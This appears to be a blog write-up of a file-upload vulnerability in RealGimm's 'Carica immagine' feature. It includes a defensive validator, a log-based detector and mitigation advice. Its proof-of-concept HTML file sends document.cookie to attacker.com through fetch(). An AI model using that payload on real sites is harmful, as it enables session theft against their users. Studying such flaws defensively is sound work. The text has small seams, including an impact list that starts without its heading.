CVE-2023-41637 - Exploiting Arbitrary File Upload in GruppoSCAI RealGimm 1.1.37p38 via Carica immagine

Security vulnerabilities that let attackers upload dangerous files are among the most serious and easy to exploit. In September 2023, a security issue known as CVE-2023-41637 was discovered in GruppoSCAI's RealGimm 1.1.37p38 software. The vulnerability affects the Carica immagine (Upload image) function, enabling attackers to upload malicious HTML files and ultimately run code on the server.

In this post, we'll break down how this vulnerability works, show example code and exploitation steps, and link to the original sources. The content is a plain-language summary based on the public reports available from the security community.

What is GruppoSCAI RealGimm?

GruppoSCAI is an Italian IT company. Their product RealGimm is a management platform used in real estate. The Carica immagine feature allows realtors to upload property images to create and update listings.

What is CVE-2023-41637?

CVE-2023-41637 is a type of vulnerability called arbitrary file upload. The Carica immagine button doesn't properly check what kind of files are being uploaded. An attacker can upload a file that is not really an image, tricking the server into accepting and storing it. If the file contains code (like HTML/JavaScript or even PHP), and if it is placed in a web-accessible directory, the attacker can visit their file and run code or steal data.

Official CVE Entry:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41637
Exploit Database:
https://www.exploit-db.com/exploits/51701

How Does the Vulnerability Work?

The Carica immagine function only checks the file extension (such as .jpg or .png), or inspects the file contents only partially. An attacker can take a dangerous file, rename it to look like an image (for example, evil.html renamed to evil.jpg), and the system will accept it.
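To make the weakness concrete, here is an added example (not RealGimm's code) that puts the extension-only check beside a hardened validator. The hardened version requires the bytes to start with a known image signature, requires that signature to agree with the extension, rejects any embedded markup or script tags, and stores the file under a server-chosen random name; the response headers for serving stored uploads are an assumption about how a fixed application would behave, not a description of the vendor's patch.

```python
# Added example (not RealGimm code): the extension-only check that lets an
# upload like evil.jpg through, beside a hardened validator that inspects the
# bytes, rejects markup, and stores the file under a server-chosen name.
import os
import secrets
from dataclasses import dataclass

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}

# Leading bytes (magic numbers) of the accepted image formats, and the
# canonical extension each one gets on disk.
MAGIC = [
    (b"\xff\xd8\xff", ".jpg"),
    (b"\x89PNG\r\n\x1a\n", ".png"),
    (b"GIF87a", ".gif"),
    (b"GIF89a", ".gif"),
]
CONTENT_TYPE = {".jpg": "image/jpeg", ".png": "image/png", ".gif": "image/gif"}
# Markers that have no business inside an image (HTML, SVG, PHP, ASP tags).
MARKUP_MARKERS = (b"<html", b"<script", b"<svg", b"<?php", b"<%")


def weak_is_image(filename: str) -> bool:
    """The vulnerable pattern: trust whatever extension the client supplied."""
    return os.path.splitext(filename)[1].lower() in ALLOWED_EXT


def sniff_extension(data: bytes):
    """Return the canonical extension implied by the magic bytes, or None."""
    for magic, ext in MAGIC:
        if data.startswith(magic):
            return ext
    return None


@dataclass
class Accepted:
    stored_name: str   # server-chosen; the client's filename is never used on disk
    content_type: str


def validate_upload(filename: str, data: bytes, max_bytes: int = 5 * 1024 * 1024) -> Accepted:
    """Hardened check. Raises ValueError carrying the reason for rejection."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext == ".jpeg":
        ext = ".jpg"
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed")
    if not data or len(data) > max_bytes:
        raise ValueError("empty or oversized upload")
    real = sniff_extension(data)
    if real is None:
        raise ValueError("content is not a supported image")
    if real != ext:
        raise ValueError(f"extension {ext} does not match content {real}")
    # Polyglot guard: a file with a valid image header must not also carry
    # markup that a browser or server-side handler could be made to execute.
    lowered = data.lower()
    if any(marker in lowered for marker in MARKUP_MARKERS):
        raise ValueError("markup found inside image data")
    # Random name on disk: no client-controlled path, no double extensions.
    return Accepted(secrets.token_hex(16) + real, CONTENT_TYPE[real])


def verdict(filename: str, data: bytes) -> str:
    """Convenience wrapper: 'accepted' or the rejection reason."""
    try:
        validate_upload(filename, data)
        return "accepted"
    except ValueError as exc:
        return str(exc)


def response_headers(content_type: str) -> dict:
    """Assumed headers for serving a stored upload: even a file that slipped
    through cannot be rendered as a document by the browser."""
    return {
        "Content-Type": content_type,
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": "attachment",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


# Constructed sample inputs: an HTML page renamed to .jpg, and a minimal JPEG header.
HTML_PAYLOAD = b"<html><body><script>alert(1)</script></body></html>"
JPEG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 32

if __name__ == "__main__":
    print("weak check on evil.jpg:", weak_is_image("evil.jpg"))
    print("hardened, evil.jpg:", verdict("evil.jpg", HTML_PAYLOAD))
    print("hardened, photo.jpg:", verdict("photo.jpg", JPEG_SAMPLE))
```

The magic-byte check is a first line of defence, not a full parser; a production service would additionally decode the image with an imaging library and re-encode it, which strips any trailing payload. The random on-disk name matters on its own: it removes the attacker's ability to guess the URL of what they uploaded, and it removes double-extension tricks such as evil.jpg.html entirely.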

Proof-of-Concept Exploit

Below is a sample HTML file that contains JavaScript code. For a real attack, this file could steal cookies, redirect users, or run anything the attacker wants.

<!-- Save as evil.html (then upload as evil.jpg or evil.html if possible) -->
<html>
  <body>
    <script>
      // This just pops up a box, but could steal cookies or send data
      alert('XSS by CVE-2023-41637!');
      // Example: Send document cookies to an attacker server
      fetch('https://attacker.com/log?cookie=' + document.cookie);
    </script>
    <h1>It works!</h1>
  </body>
</html>

Visit the URL where uploaded files are stored, for example:

https://target.com/uploads/evil.html

or

https://target.com/uploads/evil.jpg (the server may not check contents).

If the server lets you upload and then directly access your file, the vulnerability is confirmed.
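From the defender's side, that same confirmation step leaves a trace: a request for a non-image file under the upload directory. The following added example (not RealGimm code) parses common-log-format lines and flags such requests, separating those the server actually served from mere attempts. The upload directory /uploads/ and the upload endpoint path are assumptions, and the log lines are constructed.

```python
# Added example (not RealGimm code): flag web-server log entries that request
# non-image files from the upload directory, which is what a successful use of
# this bug looks like from the server side.
import os
import re
from collections import Counter

# Common/combined log format as written by Apache and nginx.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

UPLOAD_PREFIX = "/uploads/"   # assumption: the real upload directory is not given on the page
IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif"}

# Constructed sample log; /app/carica-immagine is a placeholder for the upload endpoint.
SAMPLE_LOG = """\
10.0.0.5 - - [31/Aug/2023:14:20:01 +0000] "POST /app/carica-immagine HTTP/1.1" 302 0
10.0.0.5 - - [31/Aug/2023:14:20:03 +0000] "GET /uploads/evil.html HTTP/1.1" 200 173
10.0.0.9 - - [31/Aug/2023:14:21:10 +0000] "GET /uploads/villa-12.jpg HTTP/1.1" 200 48211
10.0.0.5 - - [31/Aug/2023:14:22:45 +0000] "GET /uploads/evil.jpg.html HTTP/1.1" 200 173
10.0.0.7 - - [31/Aug/2023:14:30:12 +0000] "GET /uploads/test.php HTTP/1.1" 404 0
10.0.0.9 - - [31/Aug/2023:14:31:00 +0000] "GET /static/app.js HTTP/1.1" 200 9000
"""


def parse_line(line: str):
    """Return the log fields as a dict, or None for a line that does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def upload_findings(log_text: str) -> list:
    """Every request under UPLOAD_PREFIX whose final extension is not an image type."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or not rec["path"].startswith(UPLOAD_PREFIX):
            continue
        path = rec["path"].split("?", 1)[0]          # drop any query string
        ext = os.path.splitext(path)[1].lower()      # evil.jpg.html -> .html
        if ext in IMAGE_EXT:
            continue
        findings.append({
            "ip": rec["ip"],
            "ts": rec["ts"],
            "path": path,
            "ext": ext,
            "status": rec["status"],
            # A 2xx means the server handed the file out, i.e. the upload succeeded
            # and is web-accessible; anything else is a probe worth knowing about.
            "served": rec["status"].startswith("2"),
        })
    return findings


def offenders(findings: list) -> Counter:
    """How many flagged requests each client address made."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = upload_findings(SAMPLE_LOG)
    for h in hits:
        print(("SERVED  " if h["served"] else "attempt ") + h["ip"] + " " + h["path"])
    print("by address:", offenders(hits).most_common())
```

Run this against the access log of the host that serves uploaded images; a served hit for an .html, .svg or script extension under the upload path means a file has already been accepted, and the source address and timestamp point at the upload request that preceded it.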

- Redirecting users to phishing or malware.
- If the application also allows server-side scripts (like PHP or ASP), this could lead to remote code execution, letting attackers take over the entire server.

Update to the latest version when a patch becomes available.

Reference:
https://nvd.nist.gov/vuln/detail/CVE-2023-41637
https://packetstormsecurity.com/files/174788/RealGimm-1.1.37p38-Arbitrary-File-Upload.html

Summary

CVE-2023-41637 is a critical vulnerability in RealGimm's image upload function that allows attackers to upload and execute arbitrary code through a malicious HTML file. If your organization uses RealGimm, restrict access to its upload function, monitor for suspicious files, and demand a security patch from the vendor.

References

- CVE Details Page: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41637
- Exploit-DB Example #51701: https://www.exploit-db.com/exploits/51701
- PacketStorm Security Advisory: https://packetstormsecurity.com/files/174788/RealGimm-1.1.37p38-Arbitrary-File-Upload.html

Timeline

Published on: 08/31/2023 14:15:08 UTC
Last modified on: 09/06/2023 23:15:26 UTC